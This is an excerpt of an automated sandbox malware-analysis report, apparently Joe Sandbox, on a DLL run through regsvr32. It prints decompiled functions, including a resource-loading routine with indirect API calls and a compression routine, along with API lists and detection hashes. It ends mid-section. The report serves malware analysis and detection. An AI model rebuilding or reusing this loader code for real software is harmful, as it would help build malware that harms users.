0x6cb0b028
0x6cb0b032
0x6cb0b032
0x6cb0b039
0x6cb0b03f
0x00000000

APIs

FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 6CB0AF27
FindNextFileW.KERNEL32(00000000,?), ref: 6CB0B028

Memory Dump Source

Source File: 00000008.00000002.646378141.000000006CB01000.00000020.00020000.sdmp, Offset: 6CB00000, based on PE: true

Associated: 00000008.00000002.646374139.000000006CB00000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.646389051.000000006CB18000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.646394043.000000006CB1D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.646397499.000000006CB1F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6cb00000_regsvr32.jbxd

Similarity

API ID: FileFind$FirstNext
String ID:
API String ID: 1690352074-0
Opcode ID: b22fd713f464ff278a0b769b1b4292568c07af4e4af83cc3f9ab55de6e669b7d
Instruction ID: f55a235672da10ff82a745211d0bdddc1018c2f1139cdfaa133157ab1232fdce
Opcode Fuzzy Hash: b22fd713f464ff278a0b769b1b4292568c07af4e4af83cc3f9ab55de6e669b7d
Instruction Fuzzy Hash: 4431F571B003986FEF109BA4CC49F9E3B78EB04714F200595F515A7AC1F7719A84CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 6CB097ED, Relevance: 3.0, APIs: 2, Instructions: 24timeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?,?,6CB05F90), ref: 6CB097FA
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CB0981A

Memory Dump Source

Source File: 00000008.00000002.646378141.000000006CB01000.00000020.00020000.sdmp, Offset: 6CB00000, based on PE: true

Associated: 00000008.00000002.646374139.000000006CB00000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.646389051.000000006CB18000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.646394043.000000006CB1D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.646397499.000000006CB1F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6cb00000_regsvr32.jbxd

Similarity

API ID: Time$FileSystemUnothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 1518329722-0
Opcode ID: 5104b1353ed2ed05eed26418977aac1d227d41a9e1ee495634d0c2d8103f15e1
Instruction ID: b7c89c7030cb0bec9c01fc9c27fe1701072fd809c09b7d306b22b8066ead0e10
Opcode Fuzzy Hash: 5104b1353ed2ed05eed26418977aac1d227d41a9e1ee495634d0c2d8103f15e1
Instruction Fuzzy Hash: E8E04F7AD017187FDB10AF68DD46A9EBBFDEB80A04F114955AC41B3744E670EA048690

Uniqueness

Uniqueness Score: -1.00%

Function 6CB0A55C, Relevance: 1.6, APIs: 1, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6CB0A55C(struct HINSTANCE__* __ecx, CHAR* __edx, void* __fp0, intOrPtr* _a4) {
				CHAR* _v8;
				struct HRSRC__* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _t15;
				signed int _t17;
				struct HRSRC__* _t20;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr* _t23;
				intOrPtr* _t26;
				struct HINSTANCE__* _t28;
				intOrPtr _t30;
				intOrPtr* _t33;
				signed int _t35;
				intOrPtr _t37;
				void* _t38;
				void* _t39;
				void* _t43;

				_t43 = __fp0;
				_t29 = __ecx;
				_v8 = __edx;
				_t28 = __ecx;
				_v20 = 0xa;
				_t35 = 0;
				_v16 = 3;
				while(1) {
					_t15 =  *0x6cb1e688; // 0xd40590
					_t17 = E6CB12465(_t29, 0, _t43, _t15 + 0x648, 0x1e, 0x32);
					_t29 =  *0x6cb1e688; // 0xd40590
					_t39 = _t39 + 0xc;
					_t4 = _t29 + 0x644; // 0x0
					_t20 = FindResourceA(_t28, _v8, _t17 *  *_t4 +  *((intOrPtr*)(_t38 + _t35 * 4 - 0x10)));
					_v12 = _t20;
					if(_t20 != 0) {
						break;
					}
					_t35 = _t35 + 1;
					if(_t35 < 2) {
						continue;
					}
					L5:
					return 0;
				}
				_t21 =  *0x6cb1e684; // 0xdbfaa0
				_t22 =  *((intOrPtr*)(_t21 + 0x98))(_t28, _t20);
				_t30 =  *0x6cb1e684; // 0xdbfaa0
				_t37 = _t22;
				_t23 =  *((intOrPtr*)(_t30 + 0x9c))(_t28, _v12);
				__eflags = _t23;
				if(_t23 != 0) {
					_t33 = E6CB0864A(_t23, _t37);
					__eflags = _t33;
					if(_t33 == 0) {
						goto L5;
					}
					_t26 = _a4;
					__eflags = _t26;
					if(_t26 != 0) {
						 *_t26 = _t37;
					}
					return _t33;
				}
				goto L5;
			}

0x6cb0a55c
0x6cb0a55c
0x6cb0a565
0x6cb0a568
0x6cb0a56a
0x6cb0a571
0x6cb0a573
0x6cb0a57a
0x6cb0a57a
0x6cb0a58f
0x6cb0a594
0x6cb0a59a
0x6cb0a59d
0x6cb0a5ad
0x6cb0a5b3
0x6cb0a5b8
0x00000000
0x00000000
0x6cb0a5ba
0x6cb0a5be
0x00000000
0x00000000
0x6cb0a5e5
0x00000000
0x6cb0a5e5
0x6cb0a5c3
0x6cb0a5c9
0x6cb0a5d2
0x6cb0a5d8
0x6cb0a5db
0x6cb0a5e1
0x6cb0a5e3
0x6cb0a5f2
0x6cb0a5f4
0x6cb0a5f6
0x00000000
0x00000000
0x6cb0a5f8
0x6cb0a5fb
0x6cb0a5fd
0x6cb0a5ff
0x6cb0a5ff
0x00000000
0x6cb0a601
0x00000000

APIs

Part of subcall function 6CB12465: _ftol2_sse.MSVCRT ref: 6CB124C6

FindResourceA.KERNEL32(6CB00000,?,0000000A), ref: 6CB0A5AD

Memory Dump Source

Source File: 00000008.00000002.646378141.000000006CB01000.00000020.00020000.sdmp, Offset: 6CB00000, based on PE: true

Associated: 00000008.00000002.646374139.000000006CB00000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.646389051.000000006CB18000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.646394043.000000006CB1D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.646397499.000000006CB1F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6cb00000_regsvr32.jbxd

Similarity

API ID: FindResource_ftol2_sse
String ID:
API String ID: 726351646-0
Opcode ID: 53bd32cd4fbe7a2e9fd56bf676f78ff669945f35c3a5043539f8053e8b3a1c7a
Instruction ID: 41cd78cc2f1ee34c582f8907497422879fc9e577b8b7696cb622ec3be2ad8a5f
Opcode Fuzzy Hash: 53bd32cd4fbe7a2e9fd56bf676f78ff669945f35c3a5043539f8053e8b3a1c7a
Instruction Fuzzy Hash: 47119D71B04244AFEB048F69D84AF9E7BBCFB45348F110468F90AE7A41EA71DD008B95

Uniqueness

Uniqueness Score: -1.00%

Function 6CB16EF0, Relevance: .4, Instructions: 359
COMMONCrypto

Download Yara Rule

C-Code - Quality: 99%

			E6CB16EF0(intOrPtr _a4, signed int _a8, signed int _a12) {
				signed int _v8;
				signed short* _v12;
				char _v16;
				signed short _v20;
				unsigned int _v24;
				signed short _v28;
				signed int _t223;
				signed int _t235;
				signed int _t237;
				signed short _t240;
				signed int _t241;
				signed short _t244;
				signed int _t245;
				signed short _t248;
				signed int _t249;
				signed int _t250;
				void* _t254;
				signed char _t259;
				signed int _t275;
				signed int _t289;
				signed int _t308;
				signed short _t316;
				signed int _t321;
				void* _t329;
				signed short _t330;
				signed short _t333;
				signed short _t334;
				signed short _t343;
				signed short _t346;
				signed short _t347;
				signed short _t348;
				signed short _t358;
				signed short _t361;
				signed short _t362;
				signed short _t363;
				signed short _t370;
				signed int _t373;
				signed int _t378;
				signed short _t379;
				signed short _t382;
				unsigned int _t388;
				unsigned short _t390;
				unsigned short _t392;
				unsigned short _t394;
				signed int _t396;
				signed int _t397;
				signed int _t398;
				signed int _t400;
				signed short _t401;
				signed int _t402;
				signed int _t403;
				signed int _t407;
				signed int _t409;

				_t223 = _a8;
				_t235 =  *(_t223 + 2) & 0x0000ffff;
				_push(_t397);
				_t388 = 0;
				_t398 = _t397 | 0xffffffff;
				if(_a12 < 0) {
					L42:
					return _t223;
				} else {
					_t329 =  !=  ? 7 : 0x8a;
					_v12 = _t223 + 6;
					_t254 = (0 | _t235 != 0x00000000) + 3;
					_v16 = _a12 + 1;
					do {
						_v24 = _t388;
						_t388 = _t388 + 1;
						_a8 = _t235;
						_a12 = _t235;
						_v8 =  *_v12 & 0x0000ffff;
						_t223 = _a4;
						if(_t388 >= _t329) {
							L4:
							if(_t388 >= _t254) {
								if(_a8 == 0) {
									_t122 = _t223 + 0x16bc; // 0xec8b55c3
									_t400 =  *_t122;
									if(_t388 > 0xa) {
										_t168 = _t223 + 0xac4; // 0xff0c75ff
										_t330 =  *_t168 & 0x0000ffff;
										_t169 = _t223 + 0xac6; // 0x875ff0c
										_t237 =  *_t169 & 0x0000ffff;
										_v24 = _t330;
										_t171 = _t223 + 0x16b8; // 0x5d5b5e5f
										_t333 = (_t330 << _t400 |  *_t171) & 0x0000ffff;
										_v28 = _t333;
										if(_t400 <= 0x10 - _t237) {
											_t259 = _t400 + _t237;
										} else {
											_t173 = _t223 + 0x14; // 0xc703f045
											 *(_t223 + 0x16b8) = _t333;
											_t175 = _t223 + 8; // 0x8d000040
											 *((char*)( *_t175 +  *_t173)) = _v28;
											_t223 = _a4;
											 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
											_t181 = _t223 + 0x14; // 0xc703f045
											_t182 = _t223 + 8; // 0x8d000040
											_t183 = _t223 + 0x16b9; // 0xc35d5b5e
											 *((char*)( *_t181 +  *_t182)) =  *_t183;
											 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
											_t333 = _v24 >> 0x10;
											_t189 = _t223 + 0x16bc; // 0xec8b55c3
											_t259 =  *_t189 + 0xfffffff0 + _t237;
										}
										_t334 = _t333 & 0x0000ffff;
										 *(_t223 + 0x16bc) = _t259;
										 *(_t223 + 0x16b8) = _t334;
										_t401 = _t334 & 0x0000ffff;
										if(_t259 <= 9) {
											_t209 = _t388 - 0xb; // -10
											 *(_t223 + 0x16b8) = _t209 << _t259 | _t401;
											 *(_t223 + 0x16bc) = _t259 + 7;
										} else {
											_t193 = _t223 + 8; // 0x8d000040
											_t390 = _t388 + 0xfffffff5;
											_t194 = _t223 + 0x14; // 0xc703f045
											_t240 = _t390 << _t259 | _t401;
											 *(_t223 + 0x16b8) = _t240;
											 *( *_t193 +  *_t194) = _t240;
											 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
											_t199 = _t223 + 0x14; // 0xc703f045
											_t200 = _t223 + 8; // 0x8d000040
											_t201 = _t223 + 0x16b9; // 0xc35d5b5e
											 *((char*)( *_t199 +  *_t200)) =  *_t201;
											 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
											 *(_t223 + 0x16bc) =  *(_t223 + 0x16bc) + 0xfffffff7;
											 *(_t223 + 0x16b8) = _t390 >> 0x10;
										}
										goto L35;
									}
									_t123 = _t223 + 0xac0; // 0x6aec8b
									_t343 =  *_t123 & 0x0000ffff;
									_t124 = _t223 + 0xac2; // 0x75ff006a
									_t241 =  *_t124 & 0x0000ffff;
									_v24 = _t343;
									_t126 = _t223 + 0x16b8; // 0x5d5b5e5f
									_t346 = (_t343 << _t400 |  *_t126) & 0x0000ffff;
									_v28 = _t346;
									if(_t400 > 0x10 - _t241) {
										_t128 = _t223 + 0x14; // 0xc703f045
										 *(_t223 + 0x16b8) = _t346;
										_t130 = _t223 + 8; // 0x8d000040
										 *((char*)( *_t130 +  *_t128)) = _v28;
										_t223 = _a4;
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										_t136 = _t223 + 0x14; // 0xc703f045
										_t137 = _t223 + 8; // 0x8d000040
										_t138 = _t223 + 0x16b9; // 0xc35d5b5e
										 *((char*)( *_t136 +  *_t137)) =  *_t138;
										_t142 = _t223 + 0x16bc; // 0xec8b55c3
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										_t346 = _v24 >> 0x10;
										_t400 =  *_t142 + 0xfffffff0;
									}
									_t403 = _t400 + _t241;
									_t347 = _t346 & 0x0000ffff;
									 *(_t223 + 0x16bc) = _t403;
									 *(_t223 + 0x16b8) = _t347;
									_t348 = _t347 & 0x0000ffff;
									if(_t403 <= 0xd) {
										_t163 = _t403 + 3; // 0xec8b55c6
										_t275 = _t163;
										L28:
										 *(_t223 + 0x16bc) = _t275;
										_t165 = _t388 - 3; // -2
										_t166 = _t223 + 0x16b8; // 0x5d5b5e5f
										 *(_t223 + 0x16b8) = (_t165 << _t403 |  *_t166 & 0x0000ffff) & 0x0000ffff;
									} else {
										_t392 = _t388 + 0xfffffffd;
										_t147 = _t223 + 0x14; // 0xc703f045
										_t244 = _t392 << _t403 | _t348;
										_t148 = _t223 + 8; // 0x8d000040
										 *(_t223 + 0x16b8) = _t244;
										 *( *_t148 +  *_t147) = _t244;
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										_t153 = _t223 + 0x14; // 0xc703f045
										_t154 = _t223 + 8; // 0x8d000040
										_t155 = _t223 + 0x16b9; // 0xc35d5b5e
										 *((char*)( *_t153 +  *_t154)) =  *_t155;
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										 *(_t223 + 0x16bc) =  *(_t223 + 0x16bc) + 0xfffffff3;
										 *(_t223 + 0x16b8) = _t392 >> 0x00000010 & 0x0000ffff;
									}
									goto L35;
								}
								_t289 = _a12;
								if(_t289 != _t398) {
									_t53 = _t289 * 4; // 0x5dc033c3
									_t396 =  *(_t223 + _t53 + 0xa7e) & 0x0000ffff;
									_t56 = _t235 * 4; // 0x33c35d0c
									_t370 =  *(_t223 + _t56 + 0xa7c) & 0x0000ffff;
									_t58 = _t223 + 0x16bc; // 0xec8b55c3
									_t407 =  *_t58;
									_v28 = _t370;
									_t60 = _t223 + 0x16b8; // 0x5d5b5e5f
									_t249 = (_t370 << _t407 |  *_t60) & 0x0000ffff;
									if(_t407 <= 0x10 - _t396) {
										_t373 = _t249;
										_t308 = _t407 + _t396;
									} else {
										_t61 = _t223 + 0x14; // 0xc703f045
										_t62 = _t223 + 8; // 0x8d000040
										 *(_t223 + 0x16b8) = _t249;
										 *( *_t62 +  *_t61) = _t249;
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										_t67 = _t223 + 0x14; // 0xc703f045
										_t68 = _t223 + 8; // 0x8d000040
										_t69 = _t223 + 0x16b9; // 0xc35d5b5e
										 *((char*)( *_t67 +  *_t68)) =  *_t69;
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										_t75 = _t223 + 0x16bc; // 0xec8b55c3
										_t373 = _v28 >> 0x00000010 & 0x0000ffff;
										_t308 =  *_t75 + 0xfffffff0 + _t396;
									}
									_t388 = _v24;
									 *(_t223 + 0x16bc) = _t308;
									 *(_t223 + 0x16b8) = _t373;
								}
								_t80 = _t223 + 0xabc; // 0x55c35dc0
								_t358 =  *_t80 & 0x0000ffff;
								_t81 = _t223 + 0x16bc; // 0xec8b55c3
								_t402 =  *_t81;
								_t82 = _t223 + 0xabe; // 0xec8b55c3
								_t245 =  *_t82 & 0x0000ffff;
								_v24 = _t358;
								_t84 = _t223 + 0x16b8; // 0x5d5b5e5f
								_t361 = (_t358 << _t402 |  *_t84) & 0x0000ffff;
								_v28 = _t361;
								if(_t402 > 0x10 - _t245) {
									_t86 = _t223 + 0x14; // 0xc703f045
									 *(_t223 + 0x16b8) = _t361;
									_t88 = _t223 + 8; // 0x8d000040
									 *((char*)( *_t88 +  *_t86)) = _v28;
									_t223 = _a4;
									 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
									_t94 = _t223 + 0x14; // 0xc703f045
									_t95 = _t223 + 8; // 0x8d000040
									_t96 = _t223 + 0x16b9; // 0xc35d5b5e
									 *((char*)( *_t94 +  *_t95)) =  *_t96;
									_t100 = _t223 + 0x16bc; // 0xec8b55c3
									 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
									_t361 = _v24 >> 0x10;
									_t402 =  *_t100 + 0xfffffff0;
								}
								_t403 = _t402 + _t245;
								_t362 = _t361 & 0x0000ffff;
								 *(_t223 + 0x16bc) = _t403;
								 *(_t223 + 0x16b8) = _t362;
								_t363 = _t362 & 0x0000ffff;
								if(_t403 <= 0xe) {
									_t121 = _t403 + 2; // 0xec8b55c5
									_t275 = _t121;
									goto L28;
								} else {
									_t394 = _t388 + 0xfffffffd;
									_t105 = _t223 + 0x14; // 0xc703f045
									_t248 = _t394 << _t403 | _t363;
									_t106 = _t223 + 8; // 0x8d000040
									 *(_t223 + 0x16b8) = _t248;
									 *( *_t106 +  *_t105) = _t248;
									 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
									_t111 = _t223 + 0x14; // 0xc703f045
									_t112 = _t223 + 8; // 0x8d000040
									_t113 = _t223 + 0x16b9; // 0xc35d5b5e
									 *((char*)( *_t111 +  *_t112)) =  *_t113;
									 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
									 *(_t223 + 0x16bc) =  *(_t223 + 0x16bc) + 0xfffffff2;
									 *(_t223 + 0x16b8) = _t394 >> 0x00000010 & 0x0000ffff;
									goto L35;
								}
							} else {
								_t316 = _t223 + (_t235 + 0x29f) * 4;
								_v28 = _t316;
								do {
									_t378 = _a12;
									_t22 = _t223 + 0x16bc; // 0xec8b55c3
									_t409 =  *_t22;
									_t24 = _t378 * 4; // 0x5dc033c3
									_t250 =  *(_t223 + _t24 + 0xa7e) & 0x0000ffff;
									_t379 =  *_t316 & 0x0000ffff;
									_v24 = _t379;
									_t27 = _t223 + 0x16b8; // 0x5d5b5e5f
									_t382 = (_t379 << _t409 |  *_t27) & 0x0000ffff;
									_v20 = _t382;
									if(_t409 <= 0x10 - _t250) {
										_t321 = _t409 + _t250;
									} else {
										_t29 = _t223 + 0x14; // 0xc703f045
										 *(_t223 + 0x16b8) = _t382;
										_t31 = _t223 + 8; // 0x8d000040
										 *((char*)( *_t31 +  *_t29)) = _v20;
										_t223 = _a4;
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										_t37 = _t223 + 0x14; // 0xc703f045
										_t38 = _t223 + 8; // 0x8d000040
										_t39 = _t223 + 0x16b9; // 0xc35d5b5e
										 *((char*)( *_t37 +  *_t38)) =  *_t39;
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										_t382 = _v24 >> 0x10;
										_t45 = _t223 + 0x16bc; // 0xec8b55c3
										_t321 =  *_t45 + 0xfffffff0 + _t250;
									}
									 *(_t223 + 0x16bc) = _t321;
									_t316 = _v28;
									 *(_t223 + 0x16b8) = _t382 & 0x0000ffff;
									_t388 = _t388 - 1;
								} while (_t388 != 0);
								L35:
								_t235 = _v8;
								_t388 = 0;
								_t398 = _a12;
								if(_t235 != 0) {
									if(_a8 != _t235) {
										_t329 = 7;
										_t217 = _t329 - 3; // 0x4
										_t254 = _t217;
									} else {
										_t329 = 6;
										_t216 = _t329 - 3; // 0x3
										_t254 = _t216;
									}
								} else {
									_t329 = 0x8a;
									_t214 = _t388 + 3; // 0x3
									_t254 = _t214;
								}
								goto L41;
							}
						}
						_t223 = _a4;
						if(_t235 == _v8) {
							_t235 = _v8;
							goto L41;
						}
						goto L4;
						L41:
						_v12 =  &(_v12[2]);
						_t221 =  &_v16;
						 *_t221 = _v16 - 1;
					} while ( *_t221 != 0);
					goto L42;
				}
			}

0x6cb16ef3
0x6cb16efa
0x6cb16efe
0x6cb16f00
0x6cb16f02
0x6cb16f08
0x6cb173f5
0x6cb173fb
0x6cb16f0e
0x6cb16f1a
0x6cb16f27
0x6cb16f2a
0x6cb16f31
0x6cb16f34
0x6cb16f37
0x6cb16f3a
0x6cb16f3b
0x6cb16f3e
0x6cb16f44
0x6cb16f47
0x6cb16f4c
0x6cb16f5c
0x6cb16f5e
0x6cb17014
0x6cb171a3
0x6cb171a3
0x6cb171ac
0x6cb172bf
0x6cb172bf
0x6cb172c6
0x6cb172c6
0x6cb172cf
0x6cb172dc
0x6cb172e5
0x6cb172e8
0x6cb172ed
0x6cb17335
0x6cb172ef
0x6cb172ef
0x6cb172f2
0x6cb172f9
0x6cb172ff
0x6cb17302
0x6cb17305
0x6cb17308
0x6cb1730b
0x6cb1730e
0x6cb17314
0x6cb17322
0x6cb17325
0x6cb17328
0x6cb17331
0x6cb17331
0x6cb17338
0x6cb1733b
0x6cb17341
0x6cb17348
0x6cb1734e
0x6cb1739c
0x6cb173a8
0x6cb173af
0x6cb17350
0x6cb17350
0x6cb17353
0x6cb1735c
0x6cb1735f
0x6cb17362
0x6cb17369
0x6cb1736c
0x6cb1736f
0x6cb17372
0x6cb17375
0x6cb1737b
0x6cb17386
0x6cb1738c
0x6cb17393
0x6cb17393
0x00000000
0x6cb1734e
0x6cb171b2
0x6cb171b2
0x6cb171b9
0x6cb171b9
0x6cb171c2
0x6cb171cf
0x6cb171d8
0x6cb171db
0x6cb171e0
0x6cb171e2
0x6cb171e5
0x6cb171ec
0x6cb171f2
0x6cb171f5
0x6cb171f8
0x6cb171fb
0x6cb171fe
0x6cb17201
0x6cb17207
0x6cb17215
0x6cb1721b
0x6cb1721e
0x6cb17221
0x6cb17221
0x6cb17224
0x6cb17226
0x6cb17229
0x6cb1722f
0x6cb17236
0x6cb1723c
0x6cb17295
0x6cb17295
0x6cb17298
0x6cb17298
0x6cb1729e
0x6cb172a6
0x6cb172b3
0x6cb1723e
0x6cb1723e
0x6cb17249
0x6cb1724c
0x6cb1724f
0x6cb17252
0x6cb17259
0x6cb1725c
0x6cb1725f
0x6cb17262
0x6cb17265
0x6cb1726b
0x6cb17277
0x6cb1727c
0x6cb17289
0x6cb17289
0x00000000
0x6cb1723c
0x6cb1701a
0x6cb1701f
0x6cb17025
0x6cb17025
0x6cb1702d
0x6cb1702d
0x6cb17035
0x6cb17035
0x6cb1703d
0x6cb1704a
0x6cb17053
0x6cb17058
0x6cb1709d
0x6cb1709f
0x6cb1705a
0x6cb1705a
0x6cb1705d
0x6cb17060
0x6cb17067
0x6cb1706a
0x6cb1706d
0x6cb17070
0x6cb17073
0x6cb17079
0x6cb17087
0x6cb1708d
0x6cb17096
0x6cb17099
0x6cb17099
0x6cb170a2
0x6cb170a5
0x6cb170ab
0x6cb170ab
0x6cb170b2
0x6cb170b2
0x6cb170b9
0x6cb170b9
0x6cb170c1
0x6cb170c1
0x6cb170c8
0x6cb170d5
0x6cb170de
0x6cb170e1
0x6cb170e6
0x6cb170e8
0x6cb170eb
0x6cb170f2
0x6cb170f8
0x6cb170fb
0x6cb170fe
0x6cb17101
0x6cb17104
0x6cb17107
0x6cb1710d
0x6cb1711b
0x6cb17121
0x6cb17124
0x6cb17127
0x6cb17127
0x6cb1712a
0x6cb1712c
0x6cb1712f
0x6cb17135
0x6cb1713c
0x6cb17142
0x6cb1719b
0x6cb1719b
0x00000000
0x6cb17144
0x6cb17144
0x6cb1714f
0x6cb17152
0x6cb17155
0x6cb17158
0x6cb1715f
0x6cb17162
0x6cb17165
0x6cb17168
0x6cb1716b
0x6cb17171
0x6cb1717d
0x6cb17182
0x6cb1718f
0x00000000
0x6cb1718f
0x6cb16f64
0x6cb16f6a
0x6cb16f6d
0x6cb16f70
0x6cb16f70
0x6cb16f73
0x6cb16f73
0x6cb16f79
0x6cb16f79
0x6cb16f81
0x6cb16f86
0x6cb16f93
0x6cb16f9c
0x6cb16f9f
0x6cb16fa4
0x6cb16fec
0x6cb16fa6
0x6cb16fa6
0x6cb16fa9
0x6cb16fb0
0x6cb16fb6
0x6cb16fb9
0x6cb16fbc
0x6cb16fbf
0x6cb16fc2
0x6cb16fc5
0x6cb16fcb
0x6cb16fd9
0x6cb16fdc
0x6cb16fdf
0x6cb16fe8
0x6cb16fe8
0x6cb16ff2
0x6cb16ff8
0x6cb16ffb
0x6cb17002
0x6cb17002
0x6cb173b5
0x6cb173b5
0x6cb173b8
0x6cb173ba
0x6cb173bf
0x6cb173ce
0x6cb173da
0x6cb173df
0x6cb173df
0x6cb173d0
0x6cb173d0
0x6cb173d5
0x6cb173d5
0x6cb173d5
0x6cb173c1
0x6cb173c1
0x6cb173c6
0x6cb173c6
0x6cb173c6
0x00000000
0x6cb173bf
0x6cb16f5e
0x6cb16f53
0x6cb16f56
0x6cb173e4
0x00000000
0x6cb173e4
0x00000000
0x6cb173e7
0x6cb173e7
0x6cb173eb
0x6cb173eb
0x6cb173eb
0x00000000
0x6cb16f34

Memory Dump Source

Source File: 00000008.00000002.646378141.000000006CB01000.00000020.00020000.sdmp, Offset: 6CB00000, based on PE: true

Associated: 00000008.00000002.646374139.000000006CB00000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.646389051.000000006CB18000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.646394043.000000006CB1D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.646397499.000000006CB1F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6cb00000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0050a3338128a3e29d0738b8ec7b1954f4e7d535beab72997c1b6becb188d890
Instruction ID: ff996d053cef372ceea329ec90dfb44679a780bb7e8f0c27532fb18838794835
Opcode Fuzzy Hash: 0050a3338128a3e29d0738b8ec7b1954f4e7d535beab72997c1b6becb188d890
Instruction Fuzzy Hash: 38F1BE756092518FC709CF28C4D48F67BF1EFA9310B1E82F9D8899B7A6D3319981CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6CB15000, Relevance: .2, Instructions: 190COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.646378141.000000006CB01000.00000020.00020000.sdmp, Offset: 6CB00000, based on PE: true

Associated: 00000008.00000002.646374139.000000006CB00000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.646389051.000000006CB18000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.646394043.000000006CB1D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.646397499.000000006CB1F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6cb00000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e0e42ef6f68e9a6b00924a424e46d72adf00c68a1551fbfdb49fcceae0ed970
Instruction ID: e6487f9b972cdeeb903c1f6eaba20426ab4d1a0eee0e6764c785e103a6129f9a
Opcode Fuzzy Hash: 2e0e42ef6f68e9a6b00924a424e46d72adf00c68a1551fbfdb49fcceae0ed970
Instruction Fuzzy Hash: 607159357201A54FEF14CE6AD8E15BA33B1F78B34138A461EEA41CBB85C535E526CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6CB11790, Relevance: .2, Instructions: 169COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.646378141.000000006CB01000.00000020.00020000.sdmp, Offset: 6CB00000, based on PE: true

Associated: 00000008.00000002.646374139.000000006CB00000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.646389051.000000006CB18000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.646394043.000000006CB1D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.646397499.000000006CB1F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6cb00000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b045b8e02d75cff0f5c5dd9afabf90191d3a79a13f53d8ad1229e54d9af78786
Instruction ID: e44c7a0c03177c8af20a8f4c452920697ab97b999bab8237deeb045b7157a844
Opcode Fuzzy Hash: b045b8e02d75cff0f5c5dd9afabf90191d3a79a13f53d8ad1229e54d9af78786
Instruction Fuzzy Hash: 13519AB3B041B00BDF58CE3E8C642757ED35AD514670EC2B6F8A9CB64AE878C7059760

Uniqueness

Uniqueness Score: -1.00%

Function 6CC08923, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.646502371.000000006CC08000.00000040.00020000.sdmp, Offset: 6CC08000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6cc08000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
Instruction ID: 20b1b8f05720628e68d287e0e59874eb3dc98be88a0809c06a1ba5948c967157
Opcode Fuzzy Hash: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
Instruction Fuzzy Hash: C611D3733405009FD714DE59DC90E9673EAFB89330725C066ED08CB745E636E802C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 6CB1237E, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

